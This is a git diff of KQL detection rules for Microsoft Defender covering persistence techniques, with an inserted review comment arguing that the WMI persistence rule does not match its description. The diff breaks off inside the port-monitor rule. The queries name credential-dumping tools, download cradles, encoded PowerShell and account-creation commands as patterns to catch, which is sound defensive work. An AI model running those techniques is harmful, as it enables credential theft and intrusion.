@@ -1,12 +1,12 @@
-// Title: Uncommon Microsoft Office Trusted Location Added
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-21
-// Level: high
-// Description: Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-// False Positives:
-// - Other unknown legitimate or custom paths need to be filtered to avoid false positives
-
-DeviceRegistryEvents
+// Title: Uncommon Microsoft Office Trusted Location Added
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-21
+// Level: high
+// Description: Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Other unknown legitimate or custom paths need to be filtered to avoid false positives
+
+DeviceRegistryEvents
 | where (RegistryKey contains "Security\\Trusted Locations\\Location" and RegistryKey endswith "\\Path") and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe")))) and (not((RegistryValueData contains "%APPDATA%\\Microsoft\\Templates" or RegistryValueData contains "%%APPDATA%%\\Microsoft\\Templates" or RegistryValueData contains "%APPDATA%\\Microsoft\\Word\\Startup" or RegistryValueData contains "%%APPDATA%%\\Microsoft\\Word\\Startup" or RegistryValueData contains ":\\Program Files (x86)\\Microsoft Office\\root\\Templates\\" or RegistryValueData contains ":\\Program Files\\Microsoft Office (x86)\\Templates" or RegistryValueData contains ":\\Program Files\\Microsoft Office\\root\\Templates\\" or RegistryValueData contains ":\\Program Files\\Microsoft Office\\Templates\\")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/unsigned_appx_installation_attempt_using_add_appxpackage.kql b/KQL/rules/Persistence/unsigned_appx_installation_attempt_using_add_appxpackage.kql
index 3365d1b6..bdbe7cfb 100644
--- a/KQL/rules/Persistence/unsigned_appx_installation_attempt_using_add_appxpackage.kql
+++ b/KQL/rules/Persistence/unsigned_appx_installation_attempt_using_add_appxpackage.kql
@@ -1,12 +1,12 @@
-// Title: Unsigned AppX Installation Attempt Using Add-AppxPackage
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-31
-// Level: medium
-// Description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion
-// False Positives:
-// - Installation of unsigned packages for testing purposes
-
-DeviceProcessEvents
+// Title: Unsigned AppX Installation Attempt Using Add-AppxPackage
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-31
+// Level: medium
+// Description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion
+// False Positives:
+// - Installation of unsigned packages for testing purposes
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Add-AppPackage " or ProcessCommandLine contains "Add-AppxPackage ") and ProcessCommandLine contains " -AllowUnsigned" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/unusual_child_process_of_dns_exe.kql b/KQL/rules/Persistence/unusual_child_process_of_dns_exe.kql
index f7232a32..b439e876 100644
--- a/KQL/rules/Persistence/unusual_child_process_of_dns_exe.kql
+++ b/KQL/rules/Persistence/unusual_child_process_of_dns_exe.kql
@@ -1,10 +1,10 @@
-// Title: Unusual Child Process of dns.exe
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022-09-27
-// Level: high
-// Description: Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.initial-access, attack.t1133
-
-DeviceProcessEvents
+// Title: Unusual Child Process of dns.exe
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\conhost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/unusual_file_deletion_by_dns_exe.kql b/KQL/rules/Persistence/unusual_file_deletion_by_dns_exe.kql
index 99b3535d..b3f52523 100644
--- a/KQL/rules/Persistence/unusual_file_deletion_by_dns_exe.kql
+++ b/KQL/rules/Persistence/unusual_file_deletion_by_dns_exe.kql
@@ -1,10 +1,10 @@
-// Title: Unusual File Deletion by Dns.exe
-// Author: Tim Rauch (Nextron Systems), Elastic (idea)
-// Date: 2022-09-27
-// Level: high
-// Description: Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.initial-access, attack.t1133
-
-DeviceFileEvents
+// Title: Unusual File Deletion by Dns.exe
+// Author: Tim Rauch (Nextron Systems), Elastic (idea)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\dns.log"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/unusual_file_modification_by_dns_exe.kql b/KQL/rules/Persistence/unusual_file_modification_by_dns_exe.kql
index 14db39a0..8b8676a8 100644
--- a/KQL/rules/Persistence/unusual_file_modification_by_dns_exe.kql
+++ b/KQL/rules/Persistence/unusual_file_modification_by_dns_exe.kql
@@ -1,10 +1,10 @@
-// Title: Unusual File Modification by dns.exe
-// Author: Tim Rauch (Nextron Systems), Elastic (idea)
-// Date: 2022-09-27
-// Level: high
-// Description: Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.initial-access, attack.t1133
-
-DeviceFileEvents
+// Title: Unusual File Modification by dns.exe
+// Author: Tim Rauch (Nextron Systems), Elastic (idea)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\dns.log"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/user_added_to_admin_group_via_dscl.kql b/KQL/rules/Persistence/user_added_to_admin_group_via_dscl.kql
index 51f4164f..ddb60274 100644
--- a/KQL/rules/Persistence/user_added_to_admin_group_via_dscl.kql
+++ b/KQL/rules/Persistence/user_added_to_admin_group_via_dscl.kql
@@ -1,12 +1,12 @@
-// Title: User Added To Admin Group Via Dscl
-// Author: Sohan G (D4rkCiph3r)
-// Date: 2023-03-19
-// Level: medium
-// Description: Detects attempts to create and add an account to the admin group via "dscl"
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: User Added To Admin Group Via Dscl
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-03-19
+// Level: medium
+// Description: Detects attempts to create and add an account to the admin group via "dscl"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -append " and ProcessCommandLine contains " /Groups/admin " and ProcessCommandLine contains " GroupMembership ") and FolderPath endswith "/dscl"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/user_added_to_admin_group_via_dseditgroup.kql b/KQL/rules/Persistence/user_added_to_admin_group_via_dseditgroup.kql
index 74d485a9..1017b5ae 100644
--- a/KQL/rules/Persistence/user_added_to_admin_group_via_dseditgroup.kql
+++ b/KQL/rules/Persistence/user_added_to_admin_group_via_dseditgroup.kql
@@ -1,12 +1,12 @@
-// Title: User Added To Admin Group Via DseditGroup
-// Author: Sohan G (D4rkCiph3r)
-// Date: 2023-08-22
-// Level: medium
-// Description: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: User Added To Admin Group Via DseditGroup
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-08-22
+// Level: medium
+// Description: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -o edit " and ProcessCommandLine contains " -a " and ProcessCommandLine contains " -t user" and ProcessCommandLine contains "admin") and FolderPath endswith "/dseditgroup"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/user_added_to_admin_group_via_sysadminctl.kql b/KQL/rules/Persistence/user_added_to_admin_group_via_sysadminctl.kql
index a3602473..3de1e977 100644
--- a/KQL/rules/Persistence/user_added_to_admin_group_via_sysadminctl.kql
+++ b/KQL/rules/Persistence/user_added_to_admin_group_via_sysadminctl.kql
@@ -1,12 +1,12 @@
-// Title: User Added To Admin Group Via Sysadminctl
-// Author: Sohan G (D4rkCiph3r)
-// Date: 2023-03-19
-// Level: medium
-// Description: Detects attempts to create and add an account to the admin group via "sysadminctl"
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: User Added To Admin Group Via Sysadminctl
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-03-19
+// Level: medium
+// Description: Detects attempts to create and add an account to the admin group via "sysadminctl"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -addUser " and ProcessCommandLine contains " -admin ") and FolderPath endswith "/sysadminctl"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/vscode_powershell_profile_modification.kql b/KQL/rules/Persistence/vscode_powershell_profile_modification.kql
index c6371aa8..9f0a8e94 100644
--- a/KQL/rules/Persistence/vscode_powershell_profile_modification.kql
+++ b/KQL/rules/Persistence/vscode_powershell_profile_modification.kql
@@ -1,12 +1,12 @@
-// Title: VsCode Powershell Profile Modification
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-24
-// Level: medium
-// Description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.013
-// False Positives:
-// - Legitimate use of the profile by developers or administrators
-
-DeviceFileEvents
+// Title: VsCode Powershell Profile Modification
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-24
+// Level: medium
+// Description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.013
+// False Positives:
+// - Legitimate use of the profile by developers or administrators
+
+DeviceFileEvents
 | where FolderPath endswith "\\Microsoft.VSCode_profile.ps1"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql b/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql
index be1916c4..1ad5897e 100644
--- a/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql
+++ b/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql
@@ -1,12 +1,12 @@
-// Title: Wdigest CredGuard Registry Modification
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2019-08-25
-// Level: high
-// Description: Detects potential malicious modification of the property value of IsCredGuardEnabled from
-// HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system.
-// This is usually used with UseLogonCredential to manipulate the caching credentials.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceRegistryEvents
+// Title: Wdigest CredGuard Registry Modification
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2019-08-25
+// Level: high
+// Description: Detects potential malicious modification of the property value of IsCredGuardEnabled from
+// HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system.
+// This is usually used with UseLogonCredential to manipulate the caching credentials.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\IsCredGuardEnabled"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/wdigest_enable_uselogoncredential.kql b/KQL/rules/Persistence/wdigest_enable_uselogoncredential.kql
index 9b1e6ee7..50528dd1 100644
--- a/KQL/rules/Persistence/wdigest_enable_uselogoncredential.kql
+++ b/KQL/rules/Persistence/wdigest_enable_uselogoncredential.kql
@@ -1,10 +1,10 @@
-// Title: Wdigest Enable UseLogonCredential
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2019-09-12
-// Level: high
-// Description: Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceRegistryEvents
+// Title: Wdigest Enable UseLogonCredential
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2019-09-12
+// Level: high
+// Description: Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "WDigest\\UseLogonCredential"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/webshell_detection_with_command_line_keywords.kql b/KQL/rules/Persistence/webshell_detection_with_command_line_keywords.kql
index ff9af79d..000b1ee1 100644
--- a/KQL/rules/Persistence/webshell_detection_with_command_line_keywords.kql
+++ b/KQL/rules/Persistence/webshell_detection_with_command_line_keywords.kql
@@ -1,10 +1,10 @@
-// Title: Webshell Detection With Command Line Keywords
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community, Chad Hudson, Matt Anderson
-// Date: 2017-01-01
-// Level: high
-// Description: Detects certain command line parameters often used during reconnaissance activity via web shells
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
-
-DeviceProcessEvents
+// Title: Webshell Detection With Command Line Keywords
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community, Chad Hudson, Matt Anderson
+// Date: 2017-01-01
+// Level: high
+// Description: Detects certain command line parameters often used during reconnaissance activity via web shells
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
+
+DeviceProcessEvents
 | where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "catalina.jar" or ProcessCommandLine contains "CATALINA_HOME") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and ((ProcessCommandLine contains "&cd&echo" or ProcessCommandLine contains "cd /d ") or ((FolderPath endswith "\\dsquery.exe" or FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\pathping.exe" or FolderPath endswith "\\quser.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\tracert.exe" or FolderPath endswith "\\ver.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\whoami.exe") or (ProcessVersionInfoOriginalFileName in~ ("dsquery.exe", "find.exe", "findstr.exe", "ipconfig.exe", "netstat.exe", "nslookup.exe", "pathping.exe", "quser.exe", "schtasks.exe", "sysinfo.exe", "tasklist.exe", "tracert.exe", "ver.exe", "VSSADMIN.EXE", "wevtutil.exe", "whoami.exe"))) or (ProcessCommandLine contains " Test-NetConnection " or ProcessCommandLine contains "dir \\") or ((ProcessCommandLine contains " user " or ProcessCommandLine contains " use " or ProcessCommandLine contains " group ") and (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) or (ProcessCommandLine contains " -n " and ProcessVersionInfoOriginalFileName =~ "ping.exe") or ((ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -EncodedCommand " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains " -windowstyle hidden" or ProcessCommandLine contains ".WebClient).Download") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains " /node:" and ProcessVersionInfoOriginalFileName =~ "wmic.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql b/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql
index 1434620c..cd01bc5b 100644
--- a/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql
+++ b/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql
@@ -1,12 +1,12 @@
-// Title: Webshell Hacking Activity Patterns
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-03-17
-// Level: high
-// Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Webshell Hacking Activity Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-17
+// Level: high
+// Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "catalina.jar" or ProcessCommandLine contains "CATALINA_HOME") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "comsvcs") or (ProcessCommandLine contains " -hp" and ProcessCommandLine contains " a " and ProcessCommandLine contains " -m") or (ProcessCommandLine contains "net" and ProcessCommandLine contains " user " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "net" and ProcessCommandLine contains " localgroup " and ProcessCommandLine contains " administrators " and ProcessCommandLine contains "/add") or (FolderPath endswith "\\ntdsutil.exe" or FolderPath endswith "\\ldifde.exe" or FolderPath endswith "\\adfind.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\Nanodump.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\fsutil.exe") or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains " sekurlsa" or ProcessCommandLine contains ".dmp full" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "process call create" or ProcessCommandLine contains "reg save " or ProcessCommandLine contains "whoami /priv"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql b/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql
index 839d3e99..1daff42d 100644
--- a/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql
+++ b/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql
@@ -1,10 +1,10 @@
-// Title: Webshell Tool Reconnaissance Activity
-// Author: Cian Heasley, Florian Roth (Nextron Systems)
-// Date: 2020-07-22
-// Level: high
-// Description: Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1505.003
-
-DeviceProcessEvents
+// Title: Webshell Tool Reconnaissance Activity
+// Author: Cian Heasley, Florian Roth (Nextron Systems)
+// Date: 2020-07-22
+// Level: high
+// Description: Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003
+
+DeviceProcessEvents
 | where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "CATALINA_HOME" or ProcessCommandLine contains "catalina.jar") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and (ProcessCommandLine contains "perl --help" or ProcessCommandLine contains "perl -h" or ProcessCommandLine contains "python --help" or ProcessCommandLine contains "python -h" or ProcessCommandLine contains "python3 --help" or ProcessCommandLine contains "python3 -h" or
ProcessCommandLine contains "wget --help")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql b/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql
index 6eda5468..546b5770 100644
--- a/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql
+++ b/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql
@@ -1,14 +1,14 @@
-// Title: Winlogon AllowMultipleTSSessions Enable
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-09
-// Level: medium
-// Description: Detects when the 'AllowMultipleTSSessions' value is enabled.
-// Which allows for multiple Remote Desktop connection sessions to be opened at once.
-// This is often used by attacker as a way to connect to an RDP session without disconnecting the other users
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-// False Positives:
-// - Legitimate use of the multi session functionality
-
-DeviceRegistryEvents
+// Title: Winlogon AllowMultipleTSSessions Enable
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: medium
+// Description: Detects when the 'AllowMultipleTSSessions' value is enabled.
+// Which allows for multiple Remote Desktop connection sessions to be opened at once.
+// This is often used by attacker as a way to connect to an RDP session without disconnecting the other users
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate use of the multi session functionality
+
+DeviceRegistryEvents
 | where RegistryValueData endswith "DWORD (0x00000001)" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/wmi_persistence_script_event_consumer.kql b/KQL/rules/Persistence/wmi_persistence_script_event_consumer.kql
index 079f9503..7945b485 100644
--- a/KQL/rules/Persistence/wmi_persistence_script_event_consumer.kql
+++ b/KQL/rules/Persistence/wmi_persistence_script_event_consumer.kql
@@ -1,13 +1,13 @@
-// Title: WMI Persistence - Script Event Consumer
-// Author: Thomas Patzke
-// Date: 2018-03-07
-// Level: medium
-// Description: Detects WMI script event consumers
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.003
-// False Positives:
-// - Legitimate event consumers
-// - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button
-
-DeviceProcessEvents
+// Title: WMI Persistence - Script Event Consumer
+// Author: Thomas Patzke
+// Date: 2018-03-07
+// Level: medium
+// Description: Detects WMI script event consumers
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.003
+// False Positives:
+// - Legitimate event consumers
+// - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button
+
+DeviceProcessEvents
 | where FolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/wmi_persistence_security.kql b/KQL/rules/Persistence/wmi_persistence_security.kql
index 2deec1c8..7a92d7b3 100644
--- a/KQL/rules/Persistence/wmi_persistence_security.kql
+++ b/KQL/rules/Persistence/wmi_persistence_security.kql
@@ -1,12 +1,12 @@
-// Title: WMI Persistence - Security
-// Author: Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community
-// Date: 2017-08-22
-// Level: medium
-// Description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.003
-// False Positives:
-// - Unknown (data set is too small; further testing needed)
-
-DeviceRegistryEvents
+// Title: WMI Persistence - Security
+// Author: Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community
+// Date: 2017-08-22
+// Level: medium
+// Description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.003
+// False Positives:
+// - Unknown (data set is too small; further testing needed)
+
+DeviceRegistryEvents
 | where RegistryKey contains "subscription"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql b/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql
index 9b430f8c..f670f907 100644
--- a/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql
+++ b/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql
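Review bot: The regenerated query `DeviceRegistryEvents | where RegistryKey contains "subscription"` does not implement what its own header describes: the description speaks of WMI event filter and consumer bindings seen in WMI and Security logs, but the new side only looks for the substring `subscription` anywhere in a registry key path, which observes neither the WMI subscription namespace nor the Security log, so the rule as emitted detects something unrelated under a medium-level persistence title. If the backend falls back to DeviceRegistryEvents for log sources it cannot map, this rule should be dropped from the output or pointed at the WMI binding telemetry instead, e.g. `DeviceEvents | where ActionType == "WmiBindEventFilterToConsumer"`. The hunk itself appears to be a line-ending-only rewrite, so the mismatch predates this commit but is carried forward by the converter it introduces.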
@@ -1,11 +1,11 @@
-// Title: Add Port Monitor Persistence in Registry
-// Author: frack113
-// Date: 2021-12-30
-// Level: medium
-// Description: Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.
-// A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.
